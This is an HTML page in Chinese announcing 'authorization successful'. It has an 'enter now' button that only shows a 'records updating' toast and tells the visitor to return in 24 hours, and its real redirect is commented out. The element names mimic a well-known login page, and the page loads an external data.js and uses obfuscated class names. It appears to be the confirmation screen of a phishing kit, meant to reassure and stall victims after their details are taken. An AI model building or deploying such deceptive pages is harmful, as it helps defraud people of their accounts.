<html lang="en">
<head>
<meta charset="utf-8">
<meta name="referrer" content="always">
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<title>授权成功</title>
<meta name="apple-mobile-web-app-capable" content="yes">
<link href="./images/m.css" rel="stylesheet">
<script src="../images/jquery.min.js"></script>
<script src="../app/data.js"></script>
</head>
<body style="background-size: 50px;">
<div id="content" class="content">
  <div id="error_tips" style="display: none;">
    <div id="error_tips_content">
      <span id="error_icon"></span>
      <span id="error_message"></span>
    </div>
  </div>
  <form method="post" id="fro" action="" autocomplete="off">
  <div id="login" class="login" style="text-align:center;">
    <img src="./images/ok.png" style="width: 44%;margin: 50px 0 36px;">
	<div style="font-size:18px;color:#300;margin: 13px 0 24px;font-weight: 900;" >授权成功</div>
    <div id="web_login" style="text-align: center;">
		<div style="margin: 0 auto;">
			<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" onclick="jump();">立即进入</div>
		</div>
		<div id="switch">档案更新中...请您24小时后再来查看</div>
	</div>
</div>
</form>
</div>
<script language="javascript">
	$(function(){rs({})});
	function jump(){
	    tip( '档案更新中...请稍后！');
		// top.location.href=conf.readyJump;
	}
    //JS提示弹框
    function tip(text, time){
    	window.tmsg&&document.body.removeChild(tmsg);
    	document.body.insertAdjacentHTML('beforeEnd','<div id="tmsg" style="top:200px;left:20%;right:20%;color:#fff;margin:0 auto;opacity:0;padding:5px;font-size:15px;max-width:300px;position:fixed;text-align:center;border-radius:8px;background-color:#333;border:1px solid #222;box-shadow:rgba(0,0,0,0.25) 0px 0px 10px 6px;transition:opacity 0.6s;z-index:19891016;">'+text+'</div>');
    	setTimeout('tmsg.style.opacity=0.8',0);clearTimeout(window.tmst);
    	window.tmst=setTimeout('tmsg.style.opacity=0;setTimeout("document.body.removeChild(tmsg)",600);',time||3000);
    }
</script>
</body>
</html>